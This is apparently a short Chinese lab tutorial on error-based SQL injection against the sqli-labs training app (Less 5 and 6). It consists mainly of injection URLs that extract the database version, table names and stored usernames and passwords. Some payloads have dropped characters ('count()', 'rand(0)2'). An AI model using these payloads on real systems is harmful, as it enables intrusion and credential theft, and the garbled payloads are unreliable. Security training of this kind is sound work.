13、报错注入(Get)

环境sqli-labs

less 5

1、我们随便输入’，看到报错信息

可以判断，需要单引号闭合

2、构造查询获取数据库名称语句

http://192.168.1.120/sqli/Less-5/?id=1’ union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor (rand(0)2))x from information_schema.tables group by x)a --+

3、获取表名语句

http://192.168.1.120/sqli/Less-5/?id=1’ union select 1,2,3 from (select count(),concat((select concat(table_name,0x3a,0x3a)from information_schema.tables where table_schema=database() limit 0,1),floor (rand(0)2))x from information_schema.tables group by x)a --+

4、获取用户信息

http://192.168.1.120/sqli/Less-5/?id=1’ union select 1,2,3 from (select count(),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a)from security.users limit 2,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+

less 6

双引号闭合，和上面方法相同

禁止非法，后果自负